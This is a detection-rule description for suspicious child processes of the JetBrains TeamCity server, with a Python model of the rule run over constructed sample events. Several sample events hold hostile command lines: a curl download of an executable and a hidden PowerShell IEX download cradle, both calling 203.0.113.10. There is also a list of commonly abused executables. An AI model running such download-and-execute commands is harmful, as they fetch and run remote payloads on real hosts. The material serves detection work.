
Summary
This detection rule identifies potentially malicious child processes spawned by the JetBrains TeamCity server process. TeamCity is a continuous integration and deployment server that has been targeted through remote code execution vulnerabilities; a successful exploit typically shows up on the endpoint as the Java process hosting TeamCity launching a command interpreter or another utility it has no business running. The rule matches process-creation events in which the parent is the Java executable associated with TeamCity and the child is one of a list of known suspicious executables, such as command-line interpreters and other utilities commonly abused after exploitation.

False positives are expected: PowerShell and cmd.exe are often integral to the build and deployment steps TeamCity runs on its behalf. To reduce them, the rule's investigation guide recommends tuning the rule to the behaviour expected in the environment and excluding known safe operations, ideally by child executable together with its command line, rather than excluding an interpreter outright.

Investigation steps include reviewing the full process tree under the TeamCity Java process, examining the child's command-line arguments for suspicious execution (downloads, encoded or hidden commands, reconnaissance), and correlating the activity with TeamCity application logs and Windows security logs to establish whether it was a configured build step or the result of an exploit. For confirmed activity the guide emphasises immediate remediation: isolating the affected system and reviewing recent TeamCity configuration changes, such as newly created users or build steps.
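The detection logic described above, run over a handful of constructed Windows process-creation events, as an added example (it is not the published rule's query, and the suspicious-child list, the TeamCity parent markers, the allowlist of expected build steps and the sample events are all assumptions made for illustration):

```python
"""Model of the 'suspicious child process of TeamCity' rule over sample events.

Added example, not the rule's own query. Every constant below is an assumption
chosen to illustrate the matching and the false-positive tuning it needs.
"""
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed list of child executables worth flagging when the parent is TeamCity's JVM.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "curl.exe", "whoami.exe", "net.exe", "wmic.exe",
}

# Assumed environment-specific exclusions for known-good build steps, keyed by
# child name plus a substring expected in its command line (not by name alone).
EXPECTED_BUILD_STEPS: List[Tuple[str, str]] = [
    ("cmd.exe", "gradlew.bat"),
    ("powershell.exe", r"\build\publish.ps1"),
]

# Assumed markers identifying the TeamCity server or build-agent JVM in path or args.
TEAMCITY_MARKERS = ("teamcity", "jetbrains.buildserver")


@dataclass
class ProcessEvent:
    parent_exe: str
    parent_args: str
    child_exe: str
    child_args: str


def is_teamcity_java(parent_exe: str, parent_args: str) -> bool:
    """Parent is java.exe/javaw.exe and its path or command line names TeamCity."""
    name = ntpath.basename(parent_exe).lower()
    haystack = f"{parent_exe} {parent_args}".lower()
    return name in ("java.exe", "javaw.exe") and any(m in haystack for m in TEAMCITY_MARKERS)


def is_expected_build_step(child_name: str, child_args: str) -> bool:
    """True when the child matches an allowlisted (name, command-line fragment) pair."""
    return any(child_name == c and frag.lower() in child_args.lower()
               for c, frag in EXPECTED_BUILD_STEPS)


def evaluate(ev: ProcessEvent) -> Optional[str]:
    """Return an alert reason for the event, or None if it should not fire."""
    if not is_teamcity_java(ev.parent_exe, ev.parent_args):
        return None
    child = ntpath.basename(ev.child_exe).lower()
    if child not in SUSPICIOUS_CHILDREN:
        return None
    if is_expected_build_step(child, ev.child_args):
        return None  # tuned out as an expected build step
    return f"TeamCity JVM spawned {child}: {ev.child_args}"


def run(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, str]]:
    """Apply the rule to every event and collect the ones that alert."""
    alerts = []
    for ev in events:
        reason = evaluate(ev)
        if reason is not None:
            alerts.append((ev, reason))
    return alerts


# Constructed sample events (paths and arguments invented for this example).
SERVER_JAVA = r"C:\TeamCity\jre\bin\java.exe"
SERVER_ARGS = r"-Dteamcity.data.path=C:\ProgramData\JetBrains\TeamCity org.apache.catalina.startup.Bootstrap start"
SAMPLE_EVENTS = [
    # server JVM runs cmd.exe for recon and a download: alerts
    ProcessEvent(SERVER_JAVA, SERVER_ARGS, r"C:\Windows\System32\cmd.exe",
                 r"/c whoami & curl http://203.0.113.10/a.exe -o C:\Windows\Temp\a.exe"),
    # server JVM runs hidden PowerShell with a download cradle: alerts
    ProcessEvent(SERVER_JAVA, SERVER_ARGS,
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "-nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p')"),
    # build-agent JVM runs an allowlisted Gradle wrapper step: tuned out
    ProcessEvent(r"C:\BuildAgent\jre\bin\java.exe",
                 r"-classpath C:\BuildAgent\lib\agent.jar jetbrains.buildServer.agent.AgentMain",
                 r"C:\Windows\System32\cmd.exe", "/c gradlew.bat clean build"),
    # unrelated JVM runs cmd.exe: parent is not TeamCity, no alert
    ProcessEvent(r"C:\Program Files\Java\jdk-17\bin\java.exe", "-jar app.jar",
                 r"C:\Windows\System32\cmd.exe", "/c dir"),
    # server JVM runs git.exe: not in the suspicious list, no alert
    ProcessEvent(SERVER_JAVA, SERVER_ARGS, r"C:\Program Files\Git\cmd\git.exe", "fetch --all"),
]

if __name__ == "__main__":
    for _, reason in run(SAMPLE_EVENTS):
        print(reason)
```

The allowlist is deliberately keyed on child name plus a command-line fragment: excluding cmd.exe or powershell.exe by name would also silence the two exploitation-style events, which is the trade-off the tuning advice above is warning about.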
Categories
- Endpoint
- Windows
Data Sources
- Process
- Windows Registry
- Application Log
- Network Traffic
- Cloud Service
ATT&CK Techniques
- T1190 (Exploit Public-Facing Application)
- T1059 (Command and Scripting Interpreter)
- T1059.001 (PowerShell)
- T1059.003 (Windows Command Shell)
Created: 2024-03-24